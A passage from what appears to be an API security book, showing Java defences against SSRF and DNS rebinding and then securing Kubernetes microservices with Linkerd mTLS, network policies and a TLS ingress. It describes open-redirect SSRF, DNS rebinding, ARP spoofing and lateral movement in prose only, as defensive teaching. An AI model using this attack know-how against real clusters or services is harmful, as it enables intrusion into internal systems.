- Private-use IP address ranges, such as 10.x.x.x or 192.168.x.x in IPv4, or site-local IPv6 addresses (starting fec0 but now deprecated), or IPv6 unique local addresses (starting fd00). Nodes and pods within a Kubernetes network will normally have a private-use IPv4 address, but this can be changed.
- Addresses that are not valid for use with HTTP, such as multicast addresses or the wildcard address 0.0.0.0.
Listing 10.15 shows how to check for URLs that resolve to local or private IP addresses
using Java's java.net.InetAddress class. This class can handle both IPv4 and IPv6
addresses and provides helper methods to check for most of the types of IP address
listed previously. The only check it doesn't do is for the newer unique local addresses
that were a late addition to the IPv6 standards. It is easy to check for these yourself
though, by checking if the address is an instance of the Inet6Address class and if the
first two bytes of the raw address are the values 0xFD and 0x00. Because the hostname
in a URL may resolve to more than one IP address, you should check each address
using InetAddress.getAllByName(). If any address is private-use, then the code rejects
the request. Open the LinkPreviewer.java file and add the two new methods
from listing 10.15 to the file.
Listing 10.15 Checking for local IP addresses

private static boolean isBlockedAddress(String uri)
        throws UnknownHostException {
    var host = URI.create(uri).getHost();               // Extract the hostname from the URI.
    for (var ipAddr : InetAddress.getAllByName(host)) { // Check all IP addresses for this hostname.
        if (ipAddr.isLoopbackAddress() ||               // Check if the IP address is any local- or private-use type.
                ipAddr.isLinkLocalAddress() ||
                ipAddr.isSiteLocalAddress() ||
                ipAddr.isMulticastAddress() ||
                ipAddr.isAnyLocalAddress() ||
                isUniqueLocalAddress(ipAddr)) {
            return true;
        }
    }
    return false;                                       // Otherwise, return false.
}

private static boolean isUniqueLocalAddress(InetAddress ipAddr) {
    // To check for IPv6 unique local addresses, check the first two
    // bytes of the raw address.
    return ipAddr instanceof Inet6Address &&
            (ipAddr.getAddress()[0] & 0xFF) == 0xFD &&
            (ipAddr.getAddress()[1] & 0xFF) == 0x00;
}
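If you want to see what these InetAddress checks report before wiring them into the service, the following small standalone class (not part of the book's code) prints the relevant flags for a few sample hosts; results for real hostnames will depend on your DNS environment:

import java.net.InetAddress;

// A quick demo of the address-type checks used by isBlockedAddress.
// The sample hosts are illustrative examples only.
public class BlockedAddressDemo {
    public static void main(String[] args) throws Exception {
        for (var host : new String[] {"localhost", "169.254.1.1", "10.0.0.1"}) {
            for (var ip : InetAddress.getAllByName(host)) {
                System.out.printf("%s -> %s loopback=%b linkLocal=%b siteLocal=%b%n",
                        host, ip.getHostAddress(),
                        ip.isLoopbackAddress(),
                        ip.isLinkLocalAddress(),
                        ip.isSiteLocalAddress());
            }
        }
    }
}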
You can now update the link-preview operation to reject requests using a URL that
resolves to a local address by changing the implementation of the GET request handler
to reject requests for which isBlockedAddress returns true. Find the definition
of the GET handler in the LinkPreviewer.java file and add the check as shown below:

get("/preview", (request, response) -> {
    var url = request.queryParams("url");
    if (isBlockedAddress(url)) {
        throw new IllegalArgumentException(
                "URL refers to local/private address");
    }
Although this change prevents the most obvious SSRF attacks, it has some limitations:

- You're checking only the original URL that was provided to the service, but jsoup by default will follow redirects. An attacker can set up a public website such as http://evil.example.com, which returns an HTTP redirect to an internal address inside your cluster. Because only the original URL is validated (and appears to be a genuine site), jsoup will end up following the redirect and fetching the internal site.
- Even if you allowlist a set of known good websites, an attacker may be able to find an open redirect vulnerability on one of those sites that allows them to pull off the same trick and redirect jsoup to an internal address.
DEFINITION An open redirect vulnerability occurs when a legitimate website can be tricked into issuing an HTTP redirect to a URL supplied by the attacker. For example, many login services (including OAuth2) accept a URL as a query parameter and redirect the user to that URL after authentication. Such parameters should always be strictly validated against a list of allowed URLs.
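As an illustration of that last point, here is a minimal sketch of validating a redirect parameter against an allowlist of exact URLs. The app.example.com URLs are hypothetical placeholders, not part of the Natter API:

import java.net.URI;
import java.util.Set;

// Validate a user-supplied redirect target by exact match against a
// fixed allowlist. Exact matching avoids prefix and substring tricks
// such as https://app.example.com.evil.com/.
static URI validateRedirect(String param) {
    var allowed = Set.of(
            URI.create("https://app.example.com/home"),
            URI.create("https://app.example.com/login"));
    var uri = URI.create(param).normalize();
    if (!allowed.contains(uri)) {
        throw new IllegalArgumentException("redirect URL not allowed");
    }
    return uri;
}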
You can ensure that redirect URLs are validated for SSRF attacks by disabling the
automatic redirect handling behavior in jsoup and implementing it yourself, as shown
in listing 10.16. By calling followRedirects(false) the built-in behavior is prevented,
and jsoup will return a response with a 3xx HTTP status code when a redirect
occurs. You can then retrieve the redirected URL from the Location header on the
response. By performing the URL validation inside a loop, you can ensure that all
redirects are validated, not just the first URL. Make sure you define a limit on the number
of redirects to prevent an infinite loop. When the request returns a non-redirect
response, you can parse the document and process it as before. Open the
LinkPreviewer.java file and add the method from listing 10.16.
Listing 10.16 Validating redirects

private static Document fetch(String url) throws IOException {
    Document doc = null;
    int retries = 0;
    while (doc == null && retries++ < 10) {   // Loop until the URL resolves to a document, with a limit on the number of redirects.
        if (isBlockedAddress(url)) {          // If any URL resolves to a private-use IP address, then reject the request.
            throw new IllegalArgumentException(
                    "URL refers to local/private address");
        }
        var res = Jsoup.connect(url).followRedirects(false)   // Disable automatic redirect handling in jsoup.
                .timeout(3000).method(GET).execute();
        if (res.statusCode() / 100 == 3) {    // If the site returns a redirect status code (3xx in HTTP), then update the URL.
            url = res.header("Location");
        } else {
            doc = res.parse();                // Otherwise, parse the returned document.
        }
    }
    if (doc == null) throw new IOException("too many redirects");
    return doc;
}
Update the request handler to call the new method instead of calling jsoup directly. In
the handler for GET requests to the /preview endpoint, replace the line that currently
reads

var doc = Jsoup.connect(url).timeout(3000).get();

with the following call to the new fetch method:

var doc = fetch(url);
10.2.8 DNS rebinding attacks
A more sophisticated SSRF attack, which can defeat validation of redirects, is a DNS
rebinding attack, in which an attacker sets up a website and configures the DNS server
for the domain to a server under their control (figure 10.5). When the validation code
looks up the IP address, the DNS server returns a genuine external IP address with a
very short time-to-live value to prevent the result being cached. After validation has
succeeded, jsoup will perform another DNS lookup to actually connect to the website.
For this second lookup, the attacker’s DNS server returns an internal IP address, and
so jsoup attempts to connect to the given internal service.
DEFINITION A DNS rebinding attack occurs when an attacker sets up a fake website that they control the DNS for. After initially returning a correct IP address to bypass any validation steps, the attacker quickly switches the DNS settings to return the IP address of an internal service when the actual HTTP call is made.
Although it is hard to prevent DNS rebinding attacks when making an HTTP request
(a sketch of one partial outbound mitigation follows the list below), you can prevent
such attacks against your APIs in several ways:

- Strictly validate the Host header in the request to ensure that it matches the hostname of the API being called. The Host header is set by clients based on the URL that was used in the request and will be wrong if a DNS rebinding attack occurs. Most web servers and reverse proxies provide configuration options to explicitly verify the Host header.
- Use TLS for all requests. In this case, the TLS certificate presented by the target server won't match the hostname of the original request and so the TLS authentication handshake will fail.
- Many DNS servers and firewalls can also be configured to block potential DNS rebinding attacks for an entire network by filtering out external DNS responses that resolve to internal IP addresses.
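On the outbound side, one common mitigation, not from the book's listings and sketched here under the assumption that the caller handles the Host header and TLS server name itself, is to resolve the hostname once, validate that single result, and then connect to that exact IP address, so the attacker's DNS server never gets a second lookup:

import java.net.InetAddress;
import java.net.URI;
import java.net.URISyntaxException;
import java.net.UnknownHostException;

// Resolve once, validate, and pin the connection to the validated IP.
// Note: for HTTPS the client must still send the original hostname for
// certificate validation and SNI, which plain URI rewriting doesn't do.
static URI pinToResolvedAddress(URI url)
        throws UnknownHostException, URISyntaxException {
    var addr = InetAddress.getByName(url.getHost());
    if (addr.isLoopbackAddress() || addr.isLinkLocalAddress()
            || addr.isSiteLocalAddress() || addr.isAnyLocalAddress()) {
        throw new IllegalArgumentException("URL resolves to a blocked address");
    }
    return new URI(url.getScheme(), null, addr.getHostAddress(),
            url.getPort(), url.getPath(), url.getQuery(), null);
}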
Pop quiz

4 Which one of the following is the most secure way to validate URLs to prevent SSRF attacks?
  a Only performing GET requests
  b Only performing HEAD requests
  c Blocklisting private-use IP addresses
  d Limiting the number of requests per second
  e Strictly matching the URL against an allowlist of known safe values

The answer is at the end of the chapter.

Listing 10.17 shows how to validate the Host header in Spark Java by checking it
against a set of valid values. Each service can be accessed within the same namespace
using the short service name such as natter-api-service, or from other namespaces
in the cluster using a name like natter-api-service.natter-api. Finally, they will
also have a fully qualified name, which by default ends in .svc.cluster.local. Add
this filter to the Natter API and the link-preview microservice to prevent attacks
against those services. Open the Main.java file and add the contents of the listing to
the main method, just after the existing rate-limiting filter you added in chapter 3.
Add the same code to the LinkPreviewer class.
Figure 10.5 In a DNS rebinding attack, the attacker submits a URL referring to a domain under their control. When the API performs a DNS lookup during validation, the attacker's DNS server returns a legitimate IP address with a short time-to-live (ttl). Once validation has succeeded, the API performs a second DNS lookup to make the HTTP request, and the attacker's DNS server returns the internal IP address, causing the API to make an SSRF request even though it validated the URL.

Listing 10.17 Validating the Host header

var expectedHostNames = Set.of(   // Define all valid hostnames for your API.
        "api.natter.com",
        "api.natter.com:30567",
        "natter-link-preview-service:4567",
        "natter-link-preview-service.natter-api:4567",
        "natter-link-preview-service.natter-api.svc.cluster.local:4567");

before((request, response) -> {
    if (!expectedHostNames.contains(request.host())) {   // Reject any request that doesn't match one of the set.
        halt(400);
    }
});
If you want to be able to call the Natter API from curl, you'll also need to add the
external Minikube IP address and port, which you can get by running the minikube ip
command. For example, on my system I needed to add

"192.168.99.116:30567"

to the allowed host values in Main.java.
TIP You can create an alias for the Minikube IP address in the /etc/hosts file on Linux or MacOS by running the command sudo sh -c "echo '$(minikube ip) api.natter.local' >> /etc/hosts". On Windows, create or edit the file C:\Windows\System32\drivers\etc\hosts and add a line with the IP address, a space, and the hostname. You can then make curl calls to http://api.natter.local:30567 rather than using the IP address.
10.3 Securing microservice communications
You’ve now deployed some APIs to Kubernetes and applied some basic security con-
trols to the pods themselves by adding security annotations and using minimal Docker
base images. These measures make it harder for an attacker to break out of a con-
tainer if they find a vulnerability to exploit. But even if they can’t break out from the
container, they may still be able to cause a lot of damage by observing network traffic
and sending their own messages on the network. For example, by observing commu-
nications between the Natter API and the H2 database they can capture the connec-
tion password and then use this to directly connect to the database, bypassing the API.
In this section, you’ll see how to enable additional network protections to mitigate
against these attacks.
10.3.1 Securing communications with TLS
In a traditional network, you can limit the ability of an attacker to sniff network com-
munications by using network segmentation. Kubernetes clusters are highly dynamic,
with pods and services coming and going as configuration changes, but low-level
network segmentation is a more static approach that is hard to change. For this rea-
son, there is usually no network segmentation of this kind within a Kubernetes cluster
(although there might be between clusters running on the same infrastructure),
allowing an attacker that gains privileged access to observe all network communica-
tions within the cluster by default. They can use credentials discovered from this
snooping to access other systems and increase the scope of the attack.
DEFINITION Network segmentation refers to using switches, routers, and firewalls to divide a network into separate segments (also known as collision domains). An attacker can then only observe network traffic within the same network segment and not traffic in other segments.
Although there are approaches that provide some of the benefits of segmentation
within a cluster, a better approach is to actively protect all communications using TLS.
Apart from preventing an attacker from snooping on network traffic, TLS also protects
against a range of attacks at the network level, such as the DNS rebinding attacks
mentioned in section 10.2.8. The certificate-based authentication built into TLS protects
against spoofing attacks such as DNS cache poisoning or ARP spoofing, which rely on
the lack of authentication in low-level protocols. These attacks are prevented by firewalls,
but if an attacker is inside your network (behind the firewall) then they can
often be carried out effectively. Enabling TLS inside your cluster significantly reduces
the ability of an attacker to expand an attack after gaining an initial foothold.
DEFINITION In a DNS cache poisoning attack, the attacker sends a fake DNS message to a DNS server changing the IP address that a hostname resolves to. An ARP spoofing attack works at a lower level by changing the hardware address (ethernet MAC address, for example) that an IP address resolves to.
To enable TLS, you’ll need to generate certificates for each service and distribute the cer-
tificates and private keys to each pod that implements that service. The processes
involved in creating and distributing certificates is known as public key infrastructure (PKI).
DEFINITION A public key infrastructure is a set of procedures and processes for creating, distributing, managing, and revoking certificates used to authenticate TLS connections.
Running a PKI is complex and error-prone because there are a lot of tasks to consider:

- Private keys and certificates have to be distributed to every service in the network and kept secure.
- Certificates need to be issued by a private certificate authority (CA), which itself needs to be secured. In some cases, you may want to have a hierarchy of CAs with a root CA and one or more intermediate CAs for additional security. Services which are available to the public must obtain a certificate from a public CA.
- Servers must be configured to present a correct certificate chain and clients must be configured to trust your root CA.
- Certificates must be revoked when a service is decommissioned or if you suspect a private key has been compromised. Certificate revocation is done by publishing and distributing certificate revocation lists (CRLs) or running an online certificate status protocol (OCSP) service.
- Certificates must be automatically renewed periodically to prevent them from expiring. Because revocation involves blocklisting a certificate until it expires, short expiry times are preferred to prevent CRLs becoming too large. Ideally, certificate renewal should be completely automated.
10.3.2 Using a service mesh for TLS
In a highly dynamic environment like Kubernetes, it is not advisable to attempt to run
a PKI manually. There are a variety of tools available to help run a PKI for you. For
example, Cloudflare’s PKI toolkit (https://cfssl.org) and Hashicorp Vault (http://
mng.bz/nzrg) can both be used to automate most aspects of running a PKI. These
general-purpose tools still require a significant amount of effort to integrate into a
Kubernetes environment. An alternative that is becoming more popular in recent years
is to use a service mesh such as Istio (https://istio.io) or Linkerd (https://linkerd.io) to
handle TLS between services in your cluster for you.
DEFINITION A service mesh is a set of components that secure communications between pods in a cluster using proxy sidecar containers. In addition to security benefits, a service mesh provides other useful functions such as load balancing, monitoring, logging, and automatic request retries.
A service mesh works by installing lightweight proxies as sidecar containers into
every pod in your network, as shown in figure 10.6. These proxies intercept all network
requests coming into the pod (acting as a reverse proxy) and all requests going
out of the pod. Because all communications flow through the proxies, they can
transparently initiate and terminate TLS, ensuring that communications across the
network are secure while the individual microservices use normal unencrypted messages.
For example, a client can make a normal HTTP request to a REST API and
the client's service mesh proxy (running inside the same pod on the same machine)
will transparently upgrade this to HTTPS. The proxy at the receiver will handle the
TLS connection and forward the plain HTTP request to the target service. To make
this work, the service mesh runs a central CA service that distributes certificates to
the proxies. Because the service mesh is aware of Kubernetes service metadata, it
automatically generates correct certificates for each service and can periodically
reissue them.²

² At the time of writing, most service meshes don't support certificate revocation, so you should use short-lived certificates and avoid relying on this as your only authentication mechanism.

Using an intermediate CA

Directly issuing certificates from the root CA trusted by all your microservices is simple, but in a production environment, you'll want to automate issuing certificates. This means that the CA needs to be an online service responding to requests for new certificates. Any online service can potentially be compromised, and if this is the root of trust for all TLS certificates in your cluster (or many clusters), then you'd have no choice in this case but to rebuild the cluster from scratch. To improve the security of your clusters, you can instead keep your root CA keys offline and only use them to periodically sign an intermediate CA certificate. This intermediate CA is then used to issue certificates to individual microservices. If the intermediate CA is ever compromised, you can use the root CA to revoke its certificate and issue a new one. The root CA certificate can then be very long-lived, while intermediate CA certificates are changed regularly.

To get this to work, each service in the cluster must be configured to send the intermediate CA certificate to the client along with its own certificate, so that the client can construct a valid certificate chain from the service certificate back to the trusted root CA.

If you need to run multiple clusters, you can also use a separate intermediate CA for each cluster and use name constraints (http://mng.bz/oR8r) in the intermediate CA certificate to restrict which names it can issue certificates for (but not all clients support name constraints). Sharing a common root CA allows clusters to communicate with each other easily, while the separate intermediate CAs reduce the scope if a compromise occurs.
Figure 10.6 In a service mesh, a proxy is injected into each pod as a sidecar container. All requests to and from the other containers in the pod are redirected through the proxy. The proxy upgrades communications to use TLS using certificates it obtains from a CA running in the service mesh control plane.

To enable a service mesh, you need to install the service mesh control plane components,
such as the CA, into your cluster. Typically, these will run in their own Kubernetes
namespace. In many cases, enabling TLS is then simply a case of adding some
annotations to the deployment YAML files. The service mesh will then automatically
inject the proxy sidecar container when your pods are started and configure them
with TLS certificates.
In this section, you’ll install the Linkerd service mesh and enable TLS between the
Natter API, its database, and the link-preview service, so that all communications are
secured within the network. Linkerd has fewer features than Istio, but is much simpler
to deploy and configure, which is why I’ve chosen it for the examples in this book.
From a security perspective, the relative simplicity of Linkerd reduces the opportunity
for vulnerabilities to be introduced into your cluster.
DEFINITION The control plane of a service mesh is the set of components responsible for configuring, managing, and monitoring the proxies. The proxies themselves and the services they protect are known as the data plane.
INSTALLING LINKERD
To install Linkerd, you first need to install the linkerd command-line interface (CLI),
which will be used to configure and control the service mesh. If you have Homebrew
installed on a Mac or Linux box, then you can simply run the following command:
brew install linkerd
On other platforms it can be downloaded and installed from https://github.com/
linkerd/linkerd2/releases/. Once you’ve installed the CLI, you can run pre-installation
checks to ensure that your Kubernetes cluster is suitable for running the service mesh
by running:
linkerd check --pre
If you’ve followed the instructions for installing Minikube in this chapter, then this
will all succeed. You can then install the control plane components by running the fol-
lowing command:
linkerd install | kubectl apply -f -
Finally, run linkerd check again (without the --pre argument) to check the progress
of the installation and see when all the components are up and running. This may
take a few minutes as it downloads the container images.
To enable the service mesh for the Natter namespace, edit the namespace YAML
file to add the linkerd annotation, as shown in listing 10.18. This single annotation
will ensure that all pods in the namespace have Linkerd sidecar proxies injected the
next time they are restarted.
Listing 10.18 Enabling Linkerd

apiVersion: v1
kind: Namespace
metadata:
  name: natter-api
  labels:
    name: natter-api
  annotations:
    linkerd.io/inject: enabled   # Add the linkerd annotation to enable the service mesh.
Run the following command to update the namespace definition:
kubectl apply -f kubernetes/natter-namespace.yaml
You can force a restart of each deployment in the namespace by running the following
commands:
kubectl rollout restart deployment \
    natter-database-deployment -n natter-api
kubectl rollout restart deployment \
    link-preview-service-deployment -n natter-api
kubectl rollout restart deployment \
    natter-api-deployment -n natter-api
For HTTP APIs, such as the Natter API itself and the link-preview microservice, this is
all that is required to upgrade those services to HTTPS when called from other ser-
vices within the service mesh. You can verify this by using the Linkerd tap utility,
which allows for monitoring network connections in the cluster. You can start tap by
running the following command in a new terminal window:
linkerd tap ns/natter-api
If you then request a message that contains a link to trigger a call to the link-preview
service (using the steps at the end of section 10.2.6), you’ll see the network requests in
the tap output. This shows the initial request from curl without TLS (tls = not_provided
_by_remote), followed by the request to the link-preview service with TLS enabled
(tls = true). Finally, the response is returned to curl without TLS:
req id=2:0 proxy=in src=172.17.0.1:57757 dst=172.17.0.4:4567
➥ tls=not_provided_by_remote :method=GET :authority=
➥ natter-api-service:4567 :path=/spaces/1/messages/1
req id=2:1 proxy=out src=172.17.0.4:53996 dst=172.17.0.16:4567
➥ tls=true :method=GET :authority=natter-link-preview-
➥ service:4567 :path=/preview
rsp id=2:1 proxy=out src=172.17.0.4:53996 dst=172.17.0.16:4567
➥ tls=true :status=200 latency=479094µs
end id=2:1 proxy=out src=172.17.0.4:53996 dst=172.17.0.16:4567
➥ tls=true duration=665µs response-length=330B
rsp id=2:0 proxy=in src=172.17.0.1:57757 dst=172.17.0.4:4567
➥ tls=not_provided_by_remote :status=200 latency=518314µs
end id=2:0 proxy=in src=172.17.0.1:57757
➥ dst=172.17.0.4:4567 tls=not_provided_by_remote duration=169µs
➥ response-length=428B
You’ll enable TLS for requests coming into the network from external clients in sec-
tion 10.4.
The current version of Linkerd can automatically upgrade only HTTP traffic to use
TLS, because it relies on reading the HTTP Host header to determine the target ser-
vice. For other protocols, such as the protocol used by the H2 database, you’d need to
manually set up TLS certificates.
TIP Some service meshes, such as Istio, can automatically apply TLS to non-HTTP traffic too.³ This is planned for the 2.7 release of Linkerd. See Istio in Action by Christian E. Posta (Manning, 2020) if you want to learn more about Istio and service meshes in general.

³ Istio has more features than Linkerd but is also more complex to install and configure, which is why I chose Linkerd for this chapter.
Mutual TLS

Linkerd and most other service meshes don't just supply normal TLS server certificates, but also client certificates that are used to authenticate the client to the server. When both sides of a connection authenticate using certificates this is known as mutual TLS, or mutually authenticated TLS, often abbreviated mTLS. It's important to know that mTLS is not by itself any more secure than normal TLS. There are no attacks against TLS at the transport layer that are prevented by using mTLS. The purpose of a server certificate is to prevent the client connecting to a fake server, and it does this by authenticating the hostname of the server. If you recall the discussion of authentication in chapter 3, the server is claiming to be api.example.com and the server certificate authenticates this claim. Because the server does not initiate connections to the client, it does not need to authenticate anything for the connection to be secure.

The value of mTLS comes from the ability to use the strongly authenticated client identity communicated by the client certificate to enforce API authorization policies at the server. Client certificate authentication is significantly more secure than many other authentication mechanisms but is complex to configure and maintain. By handling this for you, a service mesh enables strong API authentication mechanisms. In chapter 11, you'll learn how to combine mTLS with OAuth2 to combine strong client authentication with token-based authorization.
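To give a flavor of what that client identity looks like to application code, here is a minimal sketch, assuming a servlet-based framework such as Spark Java and a server (or proxy) that has completed the mTLS handshake and exposed the certificate chain via the standard servlet request attribute. Whether that attribute is populated depends on your deployment; this is not one of the book's listings:

import java.security.cert.X509Certificate;
import spark.Request;

// Read the authenticated client identity from the certificate chain that
// the servlet container exposes after a successful mTLS handshake.
static String clientCertSubject(Request request) {
    var certs = (X509Certificate[]) request.raw()
            .getAttribute("javax.servlet.request.X509Certificate");
    if (certs == null || certs.length == 0) {
        return null; // no client certificate was presented
    }
    // The first certificate in the chain is the client's own certificate.
    return certs[0].getSubjectX500Principal().getName();
}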
Pop quiz

5 Which of the following are reasons to use an intermediate CA? Select all that apply.
  a To have longer certificate chains
  b To keep your operations teams busy
  c To use smaller key sizes, which are faster
  d So that the root CA key can be kept offline
  e To allow revocation in case the CA key is compromised

6 True or False: A service mesh can automatically upgrade network requests to use TLS.

The answers are at the end of the chapter.
10.3.3 Locking down network connections
Enabling TLS in the cluster ensures that an attacker can’t modify or eavesdrop on
communications between APIs in your network. But they can still make their own
connections to any service in any namespace in the cluster. For example, if they
compromise an application running in a separate namespace, they can make direct
connections to the H2 database running in the natter-api namespace. This might
allow them to attempt to guess the connection password, or to scan services in the net-
work for vulnerabilities to exploit. If they find a vulnerability, they can then compro-
mise that service and find new attack possibilities. This process of moving from service
to service inside your network after an initial compromise is known as lateral movement
and is a common tactic.
DEFINITION Lateral movement is the process of an attacker moving from system to system within your network after an initial compromise. Each new system compromised provides new opportunities to carry out further attacks, expanding the systems under the attacker's control. You can learn more about common attack tactics through frameworks such as MITRE ATT&CK (https://attack.mitre.org).
To make it harder for an attacker to carry out lateral movement, you can apply network
policies in Kubernetes that restrict which pods can connect to which other pods in a
network. A network policy allows you to state which pods are expected to connect to
each other and Kubernetes will then enforce these rules to prevent access from other
pods. You can define both ingress rules that determine what network traffic is allowed
into a pod, and egress rules that say which destinations a pod can make outgoing con-
nections to.
DEFINITION A Kubernetes network policy (http://mng.bz/v94J) defines what network traffic is allowed into and out of a set of pods. Traffic coming into a pod is known as ingress, while outgoing traffic from the pod to other hosts is known as egress.
Because Minikube does not support network policies currently, you won’t be able to
apply and test any network policies created in this chapter. Listing 10.19 shows an
example network policy that you could use to lock down network connections to and
from the H2 database pod. Apart from the usual name and namespace declarations, a
network policy consists of the following parts:
- A podSelector that describes which pods in the namespace the policy will apply to. If no policies select a pod, then it will be allowed all ingress and egress traffic by default, but if any do then it is only allowed traffic that matches at least one of the rules defined. The podSelector: {} syntax can be used to select all pods in the namespace.
- A set of policy types defined in this policy, out of the possible values Ingress and Egress. If only ingress policies are applicable to a pod then Kubernetes will still permit all egress traffic from that pod by default, and vice versa. It's best to explicitly define both Ingress and Egress policy types for all pods in a namespace to avoid confusion.
- An ingress section that defines allowlist ingress rules. Each ingress rule has a from section that says which other pods, namespaces, or IP address ranges can make network connections to the pods in this policy. It also has a ports section that defines which TCP and UDP ports those clients can connect to.
- An egress section that defines the allowlist egress rules. Like the ingress rules, egress rules consist of a to section defining the allowed destinations and a ports section defining the allowed target ports.
TIP Network policies apply to only new connections being established. If an incoming connection is permitted by the ingress policy rules, then any outgoing traffic related to that connection will be permitted without defining individual egress rules for each possible client.
Listing 10.19 defines a complete network policy for the H2 database. For ingress, it
defines a rule that allows connections to TCP port 9092 from pods with the label app:
natter-api. This allows the main Natter API pods to talk to the database. Because no
other ingress rules are defined, no other incoming connections will be accepted. The
policy in listing 10.19 also lists the Egress policy type but doesn’t define any egress
rules, which means that all outbound connections from the database pods will be
blocked. This listing is to illustrate how network policies work; you don’t need to save
the file anywhere.
NOTE The allowed ingress or egress traffic is the union of all policies that select a pod. For example, if you add a second policy that permits the database pods to make egress connections to google.com then this will be allowed even though the first policy doesn't allow this. You must examine all policies in a namespace together to determine what is allowed.
Listing 10.19 The database network policy

apiVersion: networking.k8s.io/v1
kind: NetworkPolicy
metadata:
  name: database-network-policy
  namespace: natter-api
spec:
  podSelector:        # Apply the policy to pods with the app=natter-database label.
    matchLabels:
      app: natter-database
  policyTypes:        # The policy applies to both incoming (ingress) and outgoing (egress) traffic.
  - Ingress
  - Egress
  ingress:
  - from:             # Allow ingress only from pods with the label app=natter-api in the same namespace.
    - podSelector:
        matchLabels:
          app: natter-api
    ports:            # Allow ingress only to TCP port 9092.
    - protocol: TCP
      port: 9092
You can create the policy and apply it to the cluster using kubectl apply, but on Mini-
kube it will have no effect because Minikube’s default networking components are not
able to enforce policies. Most hosted Kubernetes services, such as those provided by Goo-
gle, Amazon, and Microsoft, do support enforcing network policies. Consult the docu-
mentation for your cloud provider to see how to enable this. For self-hosted Kubernetes
clusters, you can install a network plugin such as Calico (https://www.projectcalico.org)
or Cilium (https://cilium.readthedocs.io/en/v1.6/).
As an alternative to network policies, Istio supports defining network authorization
rules in terms of the service identities contained in the client certificates it uses for
mTLS within the service mesh. These policies go beyond what is supported by net-
work policies and can control access based on HTTP methods and paths. For exam-
ple, you can allow one service to only make GET requests to another service. See
http://mng.bz/4BKa for more details. If you have a dedicated security team, then ser-
vice mesh authorization allows them to enforce consistent security controls across the
cluster, allowing API development teams to concentrate on their unique security
requirements.
WARNING Although service mesh authorization policies can significantly harden your network, they are not a replacement for API authorization mechanisms. For example, service mesh authorization provides little protection against the SSRF attacks discussed in section 10.2.7 because the malicious requests will be transparently authenticated by the proxies just like legitimate requests.
10.4 Securing incoming requests
So far, you’ve only secured communications between microservice APIs within the
cluster. The Natter API can also be called by clients outside the cluster, which you’ve
been doing with curl. To secure requests into the cluster, you can enable an ingress
controller that will receive all requests arriving from external sources as shown in fig-
ure 10.7. An ingress controller is a reverse proxy or load balancer, and can be config-
ured to perform TLS termination, rate-limiting, audit logging, and other basic security
controls. Requests that pass these checks are then forwarded on to the services within
the network. Because the ingress controller itself runs within the network, it can be
included in the Linkerd service mesh, ensuring that the forwarded requests are auto-
matically upgraded to HTTPS.
DEFINITION A Kubernetes ingress controller is a reverse proxy or load balancer that handles requests coming into the network from external clients. An ingress controller also often functions as an API gateway, providing a unified API for multiple services within the cluster.
NOTE An ingress controller usually handles incoming requests for an entire Kubernetes cluster. Enabling or disabling an ingress controller may therefore have implications for all pods running in all namespaces in that cluster.
To enable an ingress controller in Minikube, you need to enable the ingress add-on.
Before you do that, if you want to enable mTLS between the ingress and your services
you can annotate the kube-system namespace to ensure that the new ingress pod that
gets created will be part of the Linkerd service mesh. Run the following two com-
mands to launch the ingress controller inside the service mesh. First run
kubectl annotate namespace kube-system linkerd.io/inject=enabled
and then run:
minikube addons enable ingress
This will start a pod within the kube-system namespace running the NGINX web
server (https://nginx.org), which is configured to act as a reverse proxy. The ingress
controller will take a few minutes to start. You can check its progress by running
the command:
kubectl get pods -n kube-system --watch
Figure 10.7 An ingress controller acts as a gateway for all requests from external clients. The ingress can perform tasks of a reverse proxy or load balancer, such as terminating TLS connections, performing rate-limiting, and adding audit logging.
After you have enabled the ingress controller, you need to tell it how to route requests
to the services in your namespace. This is done by creating a new YAML configuration
file with kind Ingress. This configuration file can define how HTTP requests are
mapped to services within the namespace, and you can also enable TLS, rate-limiting,
and other features (see http://mng.bz/Qxqw for a list of features that can be enabled).
Listing 10.20 shows the configuration for the Natter ingress controller. To allow
Linkerd to automatically apply mTLS to connections between the ingress controller and
the backend services, you need to rewrite the Host header from the external value (such
as api.natter.local) to the internal name used by your service. This can be achieved by
adding the nginx.ingress.kubernetes.io/upstream-vhost annotation. The NGINX
configuration defines variables for the service name, port, and namespace based on the
configuration so you can use these in the definition. Create a new file named natter-
ingress.yaml in the kubernetes folder with the contents of the listing, but don’t apply it
just yet. There’s one more step you need before you can enable TLS.
TIP If you're not using a service mesh, your ingress controller may support establishing its own TLS connections to backend services or proxying TLS connections straight through to those services (known as SSL passthrough). Istio includes an alternative ingress controller, Istio Gateway, that knows how to connect to the service mesh.
Listing 10.20 Configuring ingress

apiVersion: extensions/v1beta1
kind: Ingress
metadata:
  name: api-ingress          # Give the ingress rules a name in the natter-api namespace.
  namespace: natter-api
  annotations:
    # Rewrite the Host header using the upstream-vhost annotation.
    nginx.ingress.kubernetes.io/upstream-vhost:
      "$service_name.$namespace.svc.cluster.local:$service_port"
spec:
  tls:                       # Enable TLS by providing a certificate and key.
  - hosts:
    - api.natter.local
    secretName: natter-tls
  rules:
  - host: api.natter.local   # Define a route to direct all HTTP requests to the natter-api-service.
    http:
      paths:
      - backend:
          serviceName: natter-api-service
          servicePort: 4567
To allow the ingress controller to terminate TLS requests from external clients, it
needs to be configured with a TLS certificate and private key. For development, you
can create a certificate with the mkcert utility that you used in chapter 3:
mkcert api.natter.local
This will spit out a certificate and private key in the current directory as two files with
the .pem extension. PEM stands for Privacy Enhanced Mail and is a common file for-
mat for keys and certificates. This is also the format that the ingress controller needs.
To make the key and certificate available to the ingress, you need to create a Kubernetes
secret to hold them.
DEFINITION Kubernetes secrets are a standard mechanism for distributing passwords, keys, and other credentials to pods running in a cluster. The secrets are stored in a central database and distributed to pods as either filesystem mounts or environment variables. You'll learn more about Kubernetes secrets in chapter 11.
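As a quick illustration of the filesystem-mount option, a service could read a mounted secret with a few lines of Java. The /etc/secrets path and the secret name are hypothetical examples, not something configured elsewhere in this chapter:

import java.io.IOException;
import java.nio.file.Files;
import java.nio.file.Path;

// Read a secret that Kubernetes has mounted as a file into the pod.
// File mounts avoid exposing the value in the process environment,
// where it could leak via debug endpoints or child processes.
static String loadSecret(String name) throws IOException {
    return Files.readString(Path.of("/etc/secrets", name)).trim();
}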
To make the certificate available to the ingress, run the following command:
kubectl create secret tls natter-tls -n natter-api \
--key=api.natter.local-key.pem --cert=api.natter.local.pem
This will create a TLS secret with the name natter-tls in the natter-api name-
space with the given key and certificate files. The ingress controller will be able to
find this secret because of the secretName configuration option in the ingress config-
uration file. You can now create the ingress configuration to expose the Natter API to
external clients:
kubectl apply -f kubernetes/natter-ingress.yaml
You’ll now be able to make direct HTTPS calls to the API:
